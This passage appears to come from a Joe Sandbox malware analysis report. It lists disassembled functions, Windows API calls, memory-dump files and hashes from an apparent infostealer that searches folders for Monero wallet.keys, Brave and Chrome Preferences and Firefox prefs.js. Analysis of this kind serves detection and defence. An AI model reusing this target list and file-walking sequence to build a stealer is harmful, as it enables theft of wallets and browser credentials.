                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00E60B32,00E60B2B,00000000,?,?,?,00E613F4,00E60B2A), ref: 00E4BEF5
                                  • StrCmpCA.SHLWAPI(?,00E613F8), ref: 00E4BF4D
                                  • StrCmpCA.SHLWAPI(?,00E613FC), ref: 00E4BF63
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4C7BF
                                  • FindClose.KERNEL32(000000FF), ref: 00E4C7D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-726946144
                                  • Opcode ID: 8b1c12580f93b1671797fc55a85c60fe45c915455ffc9b62cc3277f2bce22623
                                  • Instruction ID: 83dc29a88750842b01a1f632320ba832461752759d815a5da0104b4befe6f841
                                  • Opcode Fuzzy Hash: 8b1c12580f93b1671797fc55a85c60fe45c915455ffc9b62cc3277f2bce22623
                                  • Instruction Fuzzy Hash: 284266729101089BCB14FB70ED56EED73BCAF94301F445A69B906B7181EE349B4DCBA2
                                  Function 00E54910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00E5492C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E54943
                                  • StrCmpCA.SHLWAPI(?,00E60FDC), ref: 00E54971
                                  • StrCmpCA.SHLWAPI(?,00E60FE0), ref: 00E54987
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E54B7D
                                  • FindClose.KERNEL32(000000FF), ref: 00E54B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: e81f7c20d82150d5ff211a040ad9113cb7464315fcd7ea03f8fa50e0ff868862
                                  • Instruction ID: 451aefabc257d41596cbef1c37fb04bb3a032f8d410d0e1c4939cb1d82ba1d1d
                                  • Opcode Fuzzy Hash: e81f7c20d82150d5ff211a040ad9113cb7464315fcd7ea03f8fa50e0ff868862
                                  • Instruction Fuzzy Hash: 5C617AB1610214EBCB30EBA0EC45FEE73BCBB48305F045589B549A7145EB799B89CF91
                                  Function 00E54570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E54580
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E54587
                                  • wsprintfA.USER32 ref: 00E545A6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E545BD
                                  • StrCmpCA.SHLWAPI(?,00E60FC4), ref: 00E545EB
                                  • StrCmpCA.SHLWAPI(?,00E60FC8), ref: 00E54601
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E5468B
                                  • FindClose.KERNEL32(000000FF), ref: 00E546A0
                                  • lstrcat.KERNEL32(?,01CBF258), ref: 00E546C5
                                  • lstrcat.KERNEL32(?,01CBE1D8), ref: 00E546D8
                                  • lstrlen.KERNEL32(?), ref: 00E546E5
                                  • lstrlen.KERNEL32(?), ref: 00E546F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: f5d9634ed6cae163e8130e8a40994a56e9c1bbef57b375bb7147bb7806509704
                                  • Instruction ID: f51d67e89097dfb06947befb6acbf726d5944776eedb12d19a612f11cefe7cfa
                                  • Opcode Fuzzy Hash: f5d9634ed6cae163e8130e8a40994a56e9c1bbef57b375bb7147bb7806509704
                                  • Instruction Fuzzy Hash: 71517BB1654218DBC730EB70DC49FEE737CAB58305F405989B689A3184EB799788CFA1
                                  Function 00E53EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00E53EC3
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E53EDA
                                  • StrCmpCA.SHLWAPI(?,00E60FAC), ref: 00E53F08
                                  • StrCmpCA.SHLWAPI(?,00E60FB0), ref: 00E53F1E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E5406C
                                  • FindClose.KERNEL32(000000FF), ref: 00E54081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: 04217a1d2eedc2e4c6f2e7a389be027ca5b8e31f68bedd46f14d5af196653cc1
                                  • Instruction ID: e4399c999d29c06a939a570418065e0f4f7caa4cdf522e2b6b6880baed92b42a
                                  • Opcode Fuzzy Hash: 04217a1d2eedc2e4c6f2e7a389be027ca5b8e31f68bedd46f14d5af196653cc1
                                  • Instruction Fuzzy Hash: C0517BB1914218EBCB34EB70DC45EEE73BCBB48301F044589B699A7044DB799B89CF61
                                  Function 0121D3D5 Relevance: 17.9, Strings: 13, Instructions: 1656COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Fs'$6B"Y$7\$9&?$Vf|3$WS}o$gu]h$qoow$#^S$+1y$+1y$d[r$}T
                                  • API String ID: 0-1011748905
                                  • Opcode ID: 5bdc742f7263c74f5f67f2e7ea79964551102fbd8aaa59b691ac8ca323fe1327
                                  • Instruction ID: 7f8640fdb34c55bd3ff4aab45bcca2a5921592cc3ba3b418308fd7802d1c2d32
                                  • Opcode Fuzzy Hash: 5bdc742f7263c74f5f67f2e7ea79964551102fbd8aaa59b691ac8ca323fe1327
                                  • Instruction Fuzzy Hash: 25B218F360C204AFE304AE2DEC8567AF7E9EF94720F1A853DE5C4C7744E93558418696
                                  Function 00E4ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00E4ED3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E4ED55
                                  • StrCmpCA.SHLWAPI(?,00E61538), ref: 00E4EDAB
                                  • StrCmpCA.SHLWAPI(?,00E6153C), ref: 00E4EDC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4F2AE
                                  • FindClose.KERNEL32(000000FF), ref: 00E4F2C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: 27ef478c46ffdebda5e13cfd894300ab1c9e6b679384dd2ed5b626d7f025a438
                                  • Instruction ID: 3f6db0568fce5fd503a8218d073a55fcbbc26983ffbce867dad1dcc4487e1e7d
                                  • Opcode Fuzzy Hash: 27ef478c46ffdebda5e13cfd894300ab1c9e6b679384dd2ed5b626d7f025a438
                                  • Instruction Fuzzy Hash: 2DE100729111189ADB58FB60DC56EEE73B8BF54301F4456E9B80A72092EE306F8ECF51
                                  Function 00E4F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E615B8,00E60D96), ref: 00E4F71E
                                  • StrCmpCA.SHLWAPI(?,00E615BC), ref: 00E4F76F
                                  • StrCmpCA.SHLWAPI(?,00E615C0), ref: 00E4F785
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4FAB1
                                  • FindClose.KERNEL32(000000FF), ref: 00E4FAC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: c28e33b1c6c7391763eefacf6c55776abea01dc412518d7edaffe83eda019c1a
                                  • Instruction ID: b2ade20853e80f0a4b5cf575064010140f5bbd6e17b12f532b9b8ebb204a987e
                                  • Opcode Fuzzy Hash: c28e33b1c6c7391763eefacf6c55776abea01dc412518d7edaffe83eda019c1a
                                  • Instruction Fuzzy Hash: 0AB165719001189BDB28FF60DC55AEE73B9AF94301F4496B9E80AB7141EF346B4DCB92
                                  Function 00E416D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E6510C,?,?,?,00E651B4,?,?,00000000,?,00000000), ref: 00E41923
                                  • StrCmpCA.SHLWAPI(?,00E6525C), ref: 00E41973
                                  • StrCmpCA.SHLWAPI(?,00E65304), ref: 00E41989
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E41D40
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E41DCA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E41E20
                                  • FindClose.KERNEL32(000000FF), ref: 00E41E32
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: 10b944173576c6549e3fa8c983bf88c37d9c7fed9baa28d0ba423e70c74ae536
                                  • Instruction ID: 87e2478dd16db369926eafe2a3c7ef889723d94e16550808e2801e64b448a871
                                  • Opcode Fuzzy Hash: 10b944173576c6549e3fa8c983bf88c37d9c7fed9baa28d0ba423e70c74ae536
                                  • Instruction Fuzzy Hash: A612D0729101189BDB19FB60DC96AEE73B8BF54301F445AA9B90672091EF306F8DCF91
                                  Function 00E4DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00E60C2E), ref: 00E4DE5E
                                  • StrCmpCA.SHLWAPI(?,00E614C8), ref: 00E4DEAE
                                  • StrCmpCA.SHLWAPI(?,00E614CC), ref: 00E4DEC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4E3E0
                                  • FindClose.KERNEL32(000000FF), ref: 00E4E3F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: b867883bad7293443f1d0cb493309da50e141889d73c92a4e384b296900c12d4
                                  • Instruction ID: 78e2097d67b2f1565d352956813cecf892adb6749000f36ed5c27ec088811d5a
                                  • Opcode Fuzzy Hash: b867883bad7293443f1d0cb493309da50e141889d73c92a4e384b296900c12d4
                                  • Instruction Fuzzy Hash: 14F1C0729141189ACB19FB60DC95EEE7378BF54301F8466E9A81A72091EF306F8DCF51
                                  Function 00E4DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
